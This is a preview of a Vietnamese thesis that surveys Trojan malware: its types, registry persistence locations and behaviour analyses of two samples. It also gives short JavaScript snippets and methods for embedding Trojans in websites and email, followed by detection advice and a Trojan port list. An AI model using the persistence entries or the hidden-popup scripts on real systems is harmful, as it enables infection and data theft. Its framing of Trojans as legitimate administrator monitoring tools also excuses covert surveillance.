Tải bản đầy đủ (.doc) (73 trang)

Đồ án tốt nghiệp đại học xây dựng công cụ giám sát hệ thống

Bạn đang xem bản rút gọn của tài liệu. Xem và tải ngay bản đầy đủ của tài liệu tại đây (1.7 MB, 73 trang )

1
LỜI NÓI ĐẦU
2
Từ xưa đến nay vấn đề thông tin là cực kỳ quan trọng, làm chủ được
thông tin là nắm được thành công, nếu không làm chủ được thông tin thì sẽ
bị thất bại. Chính vì vậy, có rất nhiều người tìm cách lấy thông tin bằng
mọi cách mà Trojan là một công cụ hàng đầu. Với ưu điểm: Dung lượng
nhỏ, thông minh, dễ sử dụng và hiệu quả cao, Trojan đã thực sự trở thành
mối đe dọa nguy hiểm đối với bất kì một hệ thống nào. Tuy nhiên, với sự
phát triển vượt bậc của khoa học công nghệ Trojan đã không còn chỉ là vũ
khí riêng của Hacker mà còn là công cụ hữu hiệu để cho các nhà quản trị
giám sát hệ thống mạng. Việc sử dụng Trojan để giám sát đang ngày càng
phổ biến ở các nước có ngành CNTT phát triển. Công cụ giám sát này vừa
đem lại cho người quản trị một hệ thống giám sát hoàn chỉnh, đồng thời
làm tăng khả năng bảo mật an toàn thông tin cho các trao đổi thông tin trên
mạng.
Trong những năm gần đây, ở nước ta, việc ứng dụng mạng máy tính
vào nhiệm vụ của các tổ chức, đơn vị ngày càng tăng, các ứng dụng được
xây dựng ngày càng nhiều về số lượng, phạm vi ứng dụng sâu và rộng hơn
và đem lại hiệu quả rõ rệt. Bên cạnh những lợi ích to lớn mà mạng và các
dịch vụ, phần mềm trên mạng đem lại thì có một vấn đề hết sức quan trọng
mang tính thời sự đặt ra là việc quản lý, điều hành và bảo mật cho các dịch
vụ, các ứng dụng, các thông tin được trao đổi trên đường truyền. Đòi hỏi
người quản trị phải có một hệ thống với các công cụ giám sát toàn diện,
đồng thời phải có những hiểu biết sâu sắc về các phương thức tấn công của
Hacker.
Từ những yêu cầu có tính cấp thiết trên, em chọn đề tài “Xây dựng
công cụ giám sát hệ thống” làm đề tài cho đồ án tốt nghiệp của mình.Trong
quá trình thực hiện, em xin chân thành cảm ơn sự giúp đỡ tận tình của thầy
giáo hướng dẫn PGS.TS. để em có thể hoàn thành đồ án tốt nghiệp của
mình.


3
CHƯƠNG 1:TỔNG QUAN VỀ TROJAN
4
1.1.Con ngựa thành Troy –Trojan Horse
Thuật ngữ này vào một điển tích cổ, đó là cuộc chiến giữa người Hy
Lạp và người thành Troy. Thành Troy là một thành trì kiên cố, quân Hy
Lạp không sao có thể đột nhập được vào. Người ta đã nghĩ ra một kế, giả
vờ giảng hòa, sau đó tặng thành Troy một con ngựa gỗ khổng lồ. Sau khi
ngựa được đưa vào trong thành, đêm xuống những quân lính từ trong bụng
ngựa xông ra và đánh chiếm thành từ bên trong.
Những tài liệu bảo mật Internet kinh điển định nghĩa thuật ngữ này
theo nhiều cách khác nhau. Nhưng có lẽ cái nổi tiếng nhất là định nghĩa
được đưa ra trong RFC(Requests for Comments-một tài liệu Internet đặc
biệt được viết bởi các tác giả trong lĩnh vực phát triển hoặc bảo trì
Internet):
Một chương trình Trojan có thể là một chương trình mà làm điều gì
đó hữu ích, hoặc đơn thuần là điều gì đó quan tâm. Nhưng nó luôn làm điều
bất ngờ, như đánh cắp passwords hoặc copy files mà người dùng không
biết.
Ngày nay với sự phát triển như vũ bão của ngành công nghệ thông
tin thì khái niệm Trojan cũng đã có nhiều sự thay đổi và nhiều cách hiểu
khác nhau, gần đây nhất Viện Tiêu chuẩn công nghệ quốc gia Hoa kỳ
(National Institute of Standart and Technology-NIST) đã đưa ra định nghĩa
về Trojan trong tài liệu “Guide to Malware Incident Prevention and
Handling-Special Publication 800-83” ban hành tháng 11/2005 và hiện nay
khái niệm này đã trở thành phổ biến.Theo NIST:
Trojan Horse: Là loại mã độc hại được đặt theo sự tích “Ngựa
thành Troy”. Trojan horse không tự nhân bản tuy nhiên nó lây vào hệ thống
với biểu hiện rất ôn hoà nhưng thực chất bên trong có ẩn chữa các đoạn mã
với mục đích gây hại. Trojan có thể lựa chọn một trong 3 phương thức để

gây hại:
5
• Tiếp tục thực thi các chức năng của chương trình mà nó bám vào,
bên cạnh đó thực thi các hoạt động gây hại một cách riêng biệt (ví dụ
như gửi một trò chơi dụ cho người dùng sử dụng, bên cạnh đó là một
chương trình đánh cắp Password).
• Tiếp tục thực thi các chức năng của chương trình mà nó bám vào,
nhưng sửa đổi một số chức năng để gây tổn hại (ví dụ như một
Trojan giả lập một cửa sổ login để lấy password) hoặc che dấu các
hành động phá hoại khác (ví dụ như Trojan che dấu cho các tiến
trình độc hại khác bằng cách tắt các hiển thị của hệ thống).
• Thực thi luôn một chương trình gây hại bằng cách núp dưới danh
một chương trình không có hại (ví dụ như một Trojan được giới
thiệu như là một chò chơi hoặc một tool trên mạng, người dùng chỉ
cần kích hoạt file này là lập tức dữ liệu trên PC sẽ bị xoá hết).
1.2.Trojan nguy hiểm như thế nào?
Nhiều nguời không biết Trojan là gì thì suy nghĩ rằng khi chạy
chúng, họ không thấy điều gì xảy ra, và họ cho rằng Trojan không có gì
nguy hiểm, bởi vì máy tính của họ vẫn làm việc và tất cả dữ liệu vẫn còn
đó, nếu đó là một con virus thì dữ liệu đã có thể mất sạch hay máy đã
ngưng hoạt động hoặc gặp sự cố.
Khi máy nạn nhân(Victim) bị nhiễm Trojan thì tất cả dữ liệu trên
máy đều có thể bị nguy hiểm, thường thì khi Trojan nhiễm vào máy nó sẽ
gây ra các tác hại điển hình sau:
- Xóa hay viết lại các dữ liệu trên máy tính.
- Làm hỏng chức năng của các tệp.
- Lây nhiễm các phần mềm ác tính khác như là virus.
- Cài đặt để máy có thể bị điều khiển bởi máy khác.
- Đọc lén các thông tin cần thiết và gửi báo cáo đến nơi khác
- Ăn cắp thông tin như là mật khẩu và số thẻ tín dụng.

6
- Đọc các chi tiết tài khoản ngân hàng và dùng vào các mục tiêu
phạm tội.
- Cài đặt lén các phần mềm chưa được cho phép.
Hình 1.1:Hacker sử dụng Trojan tấn công
1.3.Những con đường để máy tính nạn nhân(Victim) nhiễm Trojan
Victim có thể bị nhiễm virus từ rất nhiều nguồn sau đây là một số
hình thức phổ biến:
- Qua các ứng dụng CHAT online.
- Qua các file được đính kèm trên Mail…
- Qua tầng vật lý như trao đổi dữ liệu qua USB, CD, HDD…
- Khi chạy một file bị nhiễm Trojan.
- Qua những chương trình nguy hiểm.
- Từ những trang web không tin tưởng hay những website cung cấp
phần mềm miễn phí.
- … v.v.v
- Rất nhiều lý do nhưng quan trọng là chúng ta phải cẩn thận trước
các mánh khóe, thủ đoạn của các hacker.
Ví dụ đơn giản của một Trojan horse là một chương trình mang tên
“SEXY.EXE” được đăng trên một trang Web với hứa hẹn của “ảnh hấp
dẫn” nhưng khi chạy chương trình này lại xóa tất cả tệp trong máy tính và
hiển thị các câu trêu chọc.
1.4.Các dạng Trojan cơ bản
7
Có nhiều dạng Trojan nhưng chủ yếu được chia ra thành các dạng cơ
bản sau:
1.4.1.Trojan dùng để truy cập từ xa (Remote Access Trojans)
Hiện nay, Trojan loại này được sử dụng rất nhiều. Chức năng chính
của Trojan này là mở một cổng trên máy nạn nhân để hacker có thể quay
lại truy cập vào máy nạn nhân.

Những con Trojan này rất dễ sử dụng.Chỉ cần nạn nhân bị nhiễm
Trojan và hacker có IP của nạn nhân thì hacker đã có thể truy cập toàn
quyền trên máy nạn nhân.Tùy loại Trojan mà chức năng của nó khác
nhau(download, upload file, thực hiện lệnh …).
Các Trojan nổi tiếng loại này như : netbus, back orifice …
Hình 1.2: Trojan NetBus 1.70
1.4.2.Trojan gửi mật khẩu
Mục đích của Trojan này là đọc tất cả mật khẩu lưu trong cache và
thông tin về máy Victim rồi gửi về cho hacker mỗi khi Victim online.
Những mật khẩu cho IRC, FTP, HTTP hoặc các ứng dụng khác yêu cầu
8
người dùng phải nhập login và Password hầu hết các địa chỉ email gửi về
thường nằm ở trên các website free.
Các Trojan nổi tiếng loại này như: barok, kuang, bario …
1.4.3.Keyloggers
Đây là loại Trojan rất đơn giản. Nó chỉ làm một việc đó là ghi lại tất
cả các hành động trên bàn phím của Victim và sau đó gửi cho kẻ tấn công
(Attacker) tìm kiếm password hoặc các dữ liệu nhạy cảm. Hầu hết chúng
thực hiện cả 2 chức năng ghi lại khi online và offline và tất nhiên sau đó
chúng được cấu hình để gửi file log tới một địa chỉ email hàng ngày.
Các Trojan nổi tiếng loại này như: Perfect Keylogger,sys…
Hình 1.3: Perfect Keylogger
1.4.4.Trojan phá hủy(Destructive)
9
Loại Trojan này chỉ có một chức năng là phá hủy và xóa các files.
Chúng rất đơn giản và dễ sử dụng. Chúng có thể tự động xóa tất cả các file
lõi của hệ thống (ví dụ như file: .dll, .ini,.exe,…) trên máy của Victim.
Trojan này thường được kích hoạt bởi kẻ tấn công hoặc đôi khi chúng hoạt
động như một quả bom hẹn giờ.
1.4.5.Trojan FTP

Loại Trojan này sẽ mở cổng 21 trên máy của Victim và để cho tất cả
mọi người kết nối đến máy tính của Victim mà không có mật khẩu và họ sẽ
toàn quyền tải bất kỳ dữ liệu nào xuống.
1.4.6.Trojan tấn công từ chối dịch vụ(Denial of Service)
Loại Trojan này ngày nay rất hay được sử dụng, nó cho phép kẻ tấn
công có đủ sức mạnh để tấn công từ chối dịch vụ với Victim. Ý tưởng
chính của nó là nếu chúng ta có 200 người dùng ADSL bị nhiễm và bắt đầu
tấn công Victim cùng một lúc, nó sẽ phát sinh một số lượng lớn lưu lượng
(nhiều hơn băng thông của Victim trong trường hợp này) truy cập tới
Internet sẽ bị ngừng trệ. WinTrinoo là một tool tấn công từ chối dịch vụ
được sử dụng phổ biến hiện nay.
1.4.7.Trojan tiêu diệt phần mềm
Đây là loại Trojan được tích hợp rất nhiều chức năng, nhưng cũng có
những chương trình tách biệt đó là các chương trình diệt ZoneAlarm,
Norton Anti-Virus và nhiều chương trình khác( thông thường là các
chương trình anti-virus/firewall) bảo vệ máy Victim. Khi các chương trình
này bị tiêu diệt, kẻ tấn công sẽ truy cập vào máy của Victim, thực hiện các
hoạt động bất hợp pháp.
1.5.Cách thức hoạt động của Trojan
Trojan thường gồm 2 phần, 1 phần là Client và 1 phần là Server. Khi
Victim chạy Server trên máy của mình, kẻ tấn công sẽ sử dụng Client để
kết nối tới Server và bắt đầu sử dụng Trojan. Giao thức TCP/IP là giao thức
10
thường được sử dụng để kết nối, nhưng một số Trojan sử dụng giao thức
UDP. Khi Server bắt đầu chạy trên máy của Victim, nó sẽ ẩn ở một nơi nào
đó trong máy của Victim, lắng nghe kết nối trên một vài cổng chờ đợi kết
nối từ kẻ tấn công.
 Sau khi ẩn thân an toàn chúng bắt đầu giành quyền khởi động bằng
một số cách (đây là những nơi mà Win ưu tiên khởi động trước ):
- Trong các Autostart Folder: ví dụ file khởi động của Trojan là

Trojan.exe thì C:\Windows\Start Menu\Programs\startup\Trojan.exe.
- Trong file C:\windows\Win.ini tại dòng lệnh load= Trojan.exe
hoặc run = Trojan.exe.
- Trong file c:\windows\system.ini sau dòng lệnh shell =
Explorer.exe Trojan.exe. Trojan sẽ tự động chạy khi file
Explorer.exe chạy.
- Trong Autoexec.bat :c:\ \Trojan.exe.
- Explorer Startup : c\explorer.exe, c:\ \Trojan.exe.
- Tạo một khóa trong registry :
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion
\Run] "Info"="c:\directory\Trojan.exe".
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion
\RunOnce] "Info"="c:\directory\Trojan.exe".
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion
\RunServices] "Info"="c:\directory\Trojan.exe".
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion
\RunServicesOnce] "Info"="c:\directory\Trojan.exe".
11
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\R
un] "Info"="c:\directory\Trojan.exe".
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\R
unOnce] "Info"="c:\directory\Trojan.exe".
- Trong Registry Shell Open
[HKEY_CLASSES_ROOT\exefile\shell\open\command]
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\co
mmand]
Một khóa với giá trị "%1 %*" sẽ được đặt tại đó và nếu có một vài
file chạy đặt tại đó, nó sẽ chạy mỗi khi bạn mở một file nhị phân.Nó được
sử dụng như: Trojan.exe "%1 %*" điều này sẽ khởi động Trojan.
- Trong ActiveX

HKEY_LOCAL_MACHINE\Software\Microsoft\Active
Setup\Installed Components\KeyName] StubPath=C:\directory\Trojan.exe .
Ví dụ:
Thử nghiệm với Trojan: W32.Heular, Downloader.Win32.Delf.cfo.
 W32.Heular :
Quá trình hoạt động:
Khi bị nhiễm Trojan nó sẽ tạo ra một số hoạt động sau:
Code:
%SystemDrive%\.exe
%SystemDrive%\Documents and Settings\All Users\Documents\Admin
Files.exe
%SystemDrive%\Documents and Settings\All Users\Documents\MP3
Files.exe
12
%SystemDrive%\Documents and Settings\All Users\Documents\My Media
Files.exe
%SystemDrive%\Documents and Settings\All Users\Templates\Excel
templates.exe
%SystemDrive%\Documents and Settings\All Users\Templates\PowerPoint
temlates.exe
%Userprofile%\Desktop\User.exe
%System%\Aquarium 200.scr
%System%\EraleuH.exe
%System%\filesrv32.exe
Bước kế tiếp của nó là xâm nhập vào regedit để khởi tạo các tập tin
chạy cùng Window lúc khởi động :
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr
entVersion\Run\"Microsoft File Server Manager 2.36" =
"C:\WINDOWS\system32\filesrv32.exe"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr

entVersion\Run\"Heiku - Munist" =
"C:\WINDOWS\system32\EraleuH.exe"
Việc tiếp theo là nó sẽ làm ẩn đi tính năng registry tools and the
folder options trong Window Explorer :
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr
entVersion\policies\Explorer\"NoFolderOptions" = "1"
HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre
ntVersion\Policies\System\"DisableRegistryTools" = "1"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\Defa
ultIcon\"(default)" = "C:\WINDOWS\system32\filesrv32.exe"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr
entVersion\"IeakHelpString" = "I will always be with you, Huelar!"
13
HKEY_CURRENT_USER\Software\Microsoft\Internet
Explorer\"EnableHeikus" = "1"
HKEY_CURRENT_USER\Software\Microsoft\Internet
Explorer\"InstallDate" = "1/15/2008"
HKEY_CURRENT_USER\Software\Microsoft\Internet
Explorer\Main\"Window Title" = "Freak-X Browser"
Tự động thêm vào regedit những khóa sau :
HKEY_CURRENT_USER\Software\Microsoft\Internet
Explorer\Main\"Local Page" =
"[http://]www.hentaisailormoon.com[REMOVED]"
HKEY_CURRENT_USER\Software\Microsoft\Internet
Explorer\Main\"Start Page" =
"[http://]www.hentaisailormoon.com[REMOVED]"
HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre
ntVersion\Explorer\Advanced\"Hidden" = "0"
HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre
ntVersion\Explorer\Advanced\"HideFileExt" = "1"

Khởi tạo thêm nhưng file sau vào tất cả các ổ đĩa
%DriveLetter%\[Folder Name].exe
Saved Documents.exe
My Videos.exe
My Music.exe
Important Documents.exe
Gerger_files.exe
drvspace.com
 Downloader.Win32.Delf.cfo:
Khi con trojan này xâm nhập vào máy tính, nó sẽ tiến hành download
các chương trình mã độc khác thông qua đường truyền Internet và chạy âm
14
thầm trên máy của nạn nhân mà nạn nhân không hề biết. Con trojan này có
dạng là 1 file EXE và có dung lượng 133120 byte.
Khi hoạt động con Trojan này sẽ copy file thực thi (*.exe) của nó
vào thư mục gốc của Windows , chi tiết cụ thể như sau :
Code:
%WinDir%\iexplorer.exe
Phòng trường hợp người sử dụng dùng các chương trình quản lý
khởi động để ngăn không cho nó khởi động cùng Window thì nó sẽ thêm
một đường dẫn để file thực thi trong registry hệ thống :
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"IE" = "%WinDir%\iexplorer.exe".
Sau khi xâm nhập vào máy tính và khi nạn nhân kết nối vào Internet
nó sẽ download các file từ những URL mà người viết con trojan này đã
định như sau :
e*****.com/top7_1.gif
e*****.com/top7_2.gif
o*****.kr/bbs/icon/pri ame/top7_1.gif
o*****.kr/bbs/icon/pri ame/top7_2.gif

Các file sau khi download về sẽ được lưu tại các vị trí sau :
C:\Documents and Settings\All Users\winsql.dat
C:\Documents and Settings\All Users\DirectX.aud
C:\Documents and Settings\All Users\services.exe
C:\Documents and Settings\All Users\comctl64.dll
Khi nó đã download thành công các file cần thiết thì các file này sẽ
bắt đầu hoạt động
Khôn ngoan hơn, con Trojan này cũng mở một đường link mà người
dùng không hề biết hay đồng ý :
http://pag*****.terra.com.br/arte/so /cartao059.htm
15
Để giúp cho việc kết nối giữa Trojan và chủ nhân của nó thì một số
Trojan sau này phần dữ liệu của nó còn lưu thêm 2 phần để kiểm tra tên và
mật khẩu.
1.6.Cách đính kèm Trojan vào Website,Email
1.6.1.Cách đính kèm Trojan vào Website
Có rất nhiều cách để đính kèm Trojan vào Website sau đây là một số
hình thức phổ biến:
 Dùng một đoạn mã Javascript để mở và phát tán Trojan.
Ví dụ:
Chèn đoạn mã sau: <SCRIPT language=javascript> open(“địa chỉ
con Trojan”);</SCRIPT>.
Đoạn mã trên chèn vào thẻ body của 1 trang website, khi nạn nhân
mở website Trojan sẽ mở ra và yêu cầu người lướt website mở ra.
 Sử dụng phần mềm đính Trojan
Nổi tiếng nhất là phần mềm GodWill phần mềm này cho phép thực
hiện nhiều chức năng đính kèm Trojan.
16
Hình 1.4: Godwill phần mềm đính kèm Trojan
1.6.2.Cách đính kèm Trojan vào Email

Để đính Trojan vào email có rất nhiều cách thông thường kẻ tấn
công thường lợi dụng các lỗ hổ hoặc sự chủ quan không đề phòng của
người sử dụng để đính Trojan.
 Sử dụng phần mềm:
Ví dụ như sử dụng phần mềm GodWill để gắn Trojan vào website.
Script vào thư để khi chọn thư sẽ chạy trang Web đính Trojan này.
Code:
<SCRIPT LANGUAGE="JavaScript">
Function Trojanne()
{{window.open("trang web dính
Trojan","","width=1,height=1,resizable=yes,top=10000,bottom=
10000")}}
17
</SCRIPT>
Ngoài ra hiện nay kẻ tấn công còn thường sử dụng công cụ
“Badblood”. Badblood là thuật ngữ mới được phát hiện bởi Marklord, sự
phát hiện này giúp có thể chạy file đính kèm (attached files) trong mail, mà
đặc biệt là người sử dụng không thể biết được. Badblood sử dụng script
hidden, nó không chỉ ảnh hưởng đến Outlook Express mà còn làm ảnh
hưởng tới tất cả những người sử dụng ỊE.0 với Outlook Express đi kèm
(install khi cài windows).
 Khai thác lỗ hổng bảo mật
Đa số người dùng PC thường sử dụng Outlook Express 5 (OE) để
check mail, khi chúng ta đặt cho emai ảnh nền hay nhạc nền
(OutlookExpress->New Message->Format->Background-> Picures or
Sound) thì temp file sẽ được đặt trong thư mục C:\windows\temp\dat*.tmp.
Và đây chính là lổ hổng bảo mật để gửi Trojan.
1.7.Kỹ Thuật phát hiện Trojan
Có ba nguyên lý của bất kỳ chương trình Trojan nào:
- Một Trojan muốn hoạt động phải lắng nghe các request trên một

cổng nào đó.
- Một chương trình đang chạy sẽ phải có Tên trong Process List.
Một chương trình Trojan sẽ luôn chạy cùng lúc khi máy tính khởi động.
1.7.1.Phát hiện Port sử dụng bởi Trojans
- Dùng câu lệnh Netstat – an trong Windows để biết hệ thống đang
lắng nghe trên các Port nào.
18
Hình 1.5: Netstat -an
+ Hình trên chúng ta thấy có Port 666 là Port của Trojan RST
- Dùng phần mềm Fport, TCPView: Để xem toàn bộ các Port đang sử
dụng và chương trình nào đang sử dụng Port nào. Từ đây có thể kiểm
tra các dịch vụ mạng với những Port nghi ngờ có thể dùng FireWall
để đóng lại.
19
Hình 1.6:TCPView theo dõi cổng kết nối
Một số cổng mà Trojan thường sử dụng:
Silencer|1001
Shivka-Burka|1600
SpySender|1807
Shockrave|1981
WebEx|1001
20
Doly Trojan|1011
Psyber Stream Server|1170
Ultors Trojan|1234
VooDoo Doll|1245
FTP99CMP|1492
BackDoor|1999
Trojan Cow|2001
Ripper|2023

Bugs|2115
Deep Throat|2140
The Invasor|2140
Phineas Phucker|2801
Masters Paradise|30129
Portal of Doom|3700
WinCrash|4092
ICQTrojan|4590
Sockets de Troie|5000
Sockets de Troie 1.x|5001
Firehotcker|5321
Blade Runner|5400
Blade Runner 1.x|5401
Blade Runner 2.x|5402
Robo-Hack|5569
DeepThroat|6670
DeepThroat|6771
GateCrasher|6969
Priority|6969
Remote Grab|7000
21
NetMonitor|7300
NetMonitor 1.x|7301
NetMonitor 2.x|7306
NetMonitor 3.x|7307
NetMonitor 4.x|7308
ICKiller|7789
Portal of Doom|9872
Portal of Doom 1.x|9873
Portal of Doom 2.x|9874

Portal of Doom 3.x|9875
Portal of Doom 4.x|10067
Portal of Doom 5.x|10167
iNi-Killer|9989
Senna Spy|11000
Progenic Trojan|11223
Hack?99 KeyLogger|12223
GabanBus|1245
NetBus|1245
Whack-a-mole|12361
Whack-a-mole 1.x|12362
Priority|16969
Millennium|20001
NetBus 2 Pro|20034
GirlFriend|21544
Prosiak|22222
Prosiak|33333
Evil FTP|23456
Ugly FTP|23456
22
Delta|26274
Back Orifice|31337
Back Orifice|31338
DeepBO|31338
NetSpy DK|31339
BOWhack|31666
BigGluck|34324
The Spy|40412
Masters Paradise|40421
Masters Paradise 1.x|40422

Masters Paradise 2.x|40423
Masters Paradise 3.x|40426
Sockets de Troie|50505
Fore|50766
Remote Windows Shutdown|53001
Telecommando|61466
Devil|65000
The tHing|6400
NetBus 1.x|12346
NetBus Pro 20034
SubSeven|1243
NetSphere|30100
Silencer |1001
Millenium |20000
Devil 1.03 |65000
NetMonitor| 7306
Streaming Audio Trojan| 1170
Socket23 |30303
23
Gatecrasher |6969
Telecommando | 61466
Gjamer |12076
IcqTrojen| 4950
Priotrity |16969
Vodoo | 1245
Wincrash | 5742
Wincrash2| 2583
Netspy |1033
ShockRave | 1981
Stealth Spy |555

Pass Ripper |2023
Attack FTP |666
GirlFriend | 21554
Fore, Schwindler| 50766
Tiny Telnet Server| 34324
Kuang |30999
Senna Spy Trojans| 11000
WhackJob | 23456
Phase0 | 555
BladeRunner | 5400
IcqTrojan | 4950
InIkiller | 9989
PortalOfDoom | 9872
ProgenicTrojan | 11223
Prosiak 0.47 | 22222
RemoteWindowsShutdown | 53001
RoboHack |5569
24
Silencer | 1001
Striker | 2565
TheSpy | 40412
TrojanCow | 2001
UglyFtp | 23456
WebEx |1001
Backdoor | 1999
Phineas | 2801
Psyber Streaming Server | 1509
Indoctrination | 6939
Hackers Paradise | 456
Doly Trojan | 1011

FTP99CMP | 1492
Shiva Burka | 1600
Remote Windows Shutdown | 53001
BigGluck, | 34324
NetSpy DK | 31339
Hack?99 KeyLogger | 12223
iNi-Killer | 9989
ICQKiller | 7789
Portal of Doom | 9875
Firehotcker | 5321
Master Paradise |40423
BO jammerkillahV | 121
1.7.2.Cách phát hiện các chương trình đang chạy
Đa số các Trojan đều có chức năng tắt hiển thị trong Task Manager
vì vậy mà người sử dụng không thể nhìn thấy chúng khi vào Task Manager.
Để có thể xem được tất cả các tiến trình đang chạy có thể sử dụng các phần
25

×